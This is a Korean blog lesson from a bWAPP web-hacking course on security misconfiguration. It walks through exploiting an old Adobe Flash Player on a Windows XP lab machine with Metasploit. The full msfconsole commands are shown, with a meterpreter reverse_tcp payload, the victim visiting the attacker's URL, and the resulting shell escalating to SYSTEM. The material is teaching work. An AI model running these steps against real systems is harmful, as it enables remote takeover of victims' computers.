정보보안(구버전)/ bWAPP 2019. 2. 15. 21:11

웹 해킹 bWAPP(작업중) - 64. A5 - Security Misconfiguration - Cross-Domain Policy File(Flash)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Security Misconfiguration

 

 - OWASP Top10 A5 - 잘못된 보안 구성
 - 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
 - Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,

         특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일

 

 

 

2. Security Misconfiguration - Cross-Domain Policy File(Flash)

 

 - 이 시나리오는 Adobe Flash Player 취약점을 이용하여 내용이다. 

 - WinXP에서 사용할 Adobe Flash Player 10.2.153.1 다운로드 사이트 :

 - https://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html#main_Archived_versions

 

  

Ex1) Security Misconfiguration - Cross-Domain Policy File(Flash) 이해

 

 

보안 레벨 선택 및 시나리오 선택

 

 

bWAPP에서 제공하는 Flash 관련 파일들이 제대로 동작하지 않음(메타스플로잇으로 대체할 예정)

 

 

 

메타스플로잇을 이용한 Adobe 취약점 확인(타겟 : WinXP, Adobe Flash Player 10.2.153.1)

root@kali:~# msfconsole -q

msf > use exploit/windows/browser/adobe_flashplayer_flash10o


msf exploit(windows/browser/adobe_flashplayer_flash10o) > set srvhost 192.168.20.50

srvhost => 192.168.20.50


msf exploit(windows/browser/adobe_flashplayer_flash10o) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp


msf exploit(windows/browser/adobe_flashplayer_flash10o) > set lhost 192.168.20.50
lhost => 192.168.20.50


msf5 exploit(windows/browser/adobe_flashplayer_flash10o) > exploit


[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Using URL: http://192.168.20.50:8080/SPz8Z0HgP58O0
[*] Server started. 

 

 

 

WinXP에서 'http://192.168.20.50:8080/SPz8Z0HgP58O0'으로 접근 실시

 

 

 

메타스플로잇 세션 연결 확인

[*] 192.168.20.203   adobe_flashplayer_flash10o - Sending HTML to...
[*] 192.168.20.203   adobe_flashplayer_flash10o - Sending trigger SWF...
[*] Sending stage (179779 bytes) to 192.168.20.203
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.203:1363) at 2019-03-04 09:50:22 +0900
[*] Session ID 1 (192.168.20.50:4444 -> 192.168.20.203:1363) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is iexplore.exe (2180) as: WITH-15B28B4CFD\admin
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (524)
[+] Successfully migrated to services.exe (524) as: NT AUTHORITY\SYSTEM

 

msf exploit(windows/browser/adobe_flashplayer_flash10o) > sessions -i

 

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  WITH-15B28B4CFD\admin @ WITH-15B28B4CFD  192.168.20.50:4444 -> 192.168.20.203:1363 (192.168.20.203)

msf exploit(windows/browser/adobe_flashplayer_flash10o) > sessions -i 1
[*] Starting interaction with 1...

 

meterpreter > sysinfo


Computer        : WITH-15B28B4CFD
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.20.203 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/browser/adobe_flashplayer_flash10o) > quit

 

[*] Server stopped.


root@kali:~# 

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 64. A5 - bWAPP Security Misconfiguration - Cross-Domain Policy File(Flash)   https://youtu.be/YLfmyOIeJZo

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q